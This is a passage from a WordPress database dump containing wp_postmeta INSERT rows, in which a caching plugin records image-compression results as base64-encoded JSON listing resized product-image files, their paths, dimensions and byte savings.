pdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyNS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI1LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1NjEsInRpbWUiOjE0ODM1NTI3NTUsImlkIjoxODkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyNS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI1LTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo5MzgsInRpbWUiOjE0ODM1NTI3NTgsImlkIjoxODkwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29052, 1889, 'wpfc_optimisation_reduction', '22870'); 
INSERT INTO `wp_postmeta` VALUES (29053, 1889, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTVDLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTVDLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTI3NjMsImlkIjoiMTg4OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTVDLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTVDLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MTVDLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4OTQsInRpbWUiOjE0ODM1NTI3NjYsImlkIjoxODg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODE1Qy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODE1Qy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODE1Qy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Mjg4OCwidGltZSI6MTQ4MzU1Mjc3MCwiaWQiOjE4ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTVDLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTVDLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MTVDLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNTg5LCJ0aW1lIjoxNDgzNTUyNzczLCJpZCI6MTg4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxNUMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTVDLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgxNUMtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTE1NzUsInRpbWUiOjE0ODM1NTI3NzcsImlkIjoxODg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODE1Qy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODE1Qy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODE1Qy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTY3LCJ0aW1lIjoxNDgzNTUyNzgwLCJpZCI6MTg4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxNUMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxNUMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgxNUMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ4MiwidGltZSI6MTQ4MzU1Mjc4NCwiaWQiOjE4ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTVDLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTVDLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MTVDLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NjMsInRpbWUiOjE0ODM1NTI3ODcsImlkIjoxODg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODE1Qy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODE1Qy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODE1Qy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTc5MCwidGltZSI6MTQ4MzU1Mjc5MCwiaWQiOjE4ODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxNUMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxNUMtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgxNUMtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjYxMSwidGltZSI6MTQ4MzU1Mjc5NCwiaWQiOjE4ODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxNUMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxNUMtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgxNUMtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjkxMSwidGltZSI6MTQ4MzU1Mjc5NywiaWQiOjE4ODl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29054, 1888, 'wpfc_optimisation_reduction', '23210'); 
INSERT INTO `wp_postmeta` VALUES (29055, 1888, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxMy5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUyODAxLCJpZCI6IjE4ODgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgxMy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODUyLCJ0aW1lIjoxNDgzNTUyODA1LCJpZCI6MTg4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxMy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MTMtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI5NTUsInRpbWUiOjE0ODM1NTI4MDksImlkIjoxODg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgxMy03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjY5MCwidGltZSI6MTQ4MzU1MjgxMiwiaWQiOjE4ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODEzLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjExNjk2LCJ0aW1lIjoxNDgzNTUyODE2LCJpZCI6MTg4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxMy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MTMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYwMywidGltZSI6MTQ4MzU1MjgyMCwiaWQiOjE4ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxMy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODEzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjIsInRpbWUiOjE0ODM1NTI4MjMsImlkIjoxODg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgxMy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTY5LCJ0aW1lIjoxNDgzNTUyODI2LCJpZCI6MTg4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxMy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MTMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE4NjIsInRpbWUiOjE0ODM1NTI4MzEsImlkIjoxODg4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxMy0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODEzLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1ODYsInRpbWUiOjE0ODM1NTI4MzUsImlkIjoxODg4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxMy00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODEzLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo5MzUsInRpbWUiOjE0ODM1NTI4MzgsImlkIjoxODg4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29056, 1887, 'wpfc_optimisation_reduction', '25824'); 
INSERT INTO `wp_postmeta` VALUES (29057, 1887, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLVctMS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUyODQyLCJpZCI6IjE4ODcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLVctMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTkyLCJ0aW1lIjoxNDgzNTUyODQ2LCJpZCI6MTg4N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLVctMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0xLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMzNTAsInRpbWUiOjE0ODM1NTI4NDksImlkIjoxODg3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLVctMS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MzAwOCwidGltZSI6MTQ4MzU1Mjg1MiwiaWQiOjE4ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTEtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtVy0xLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEyO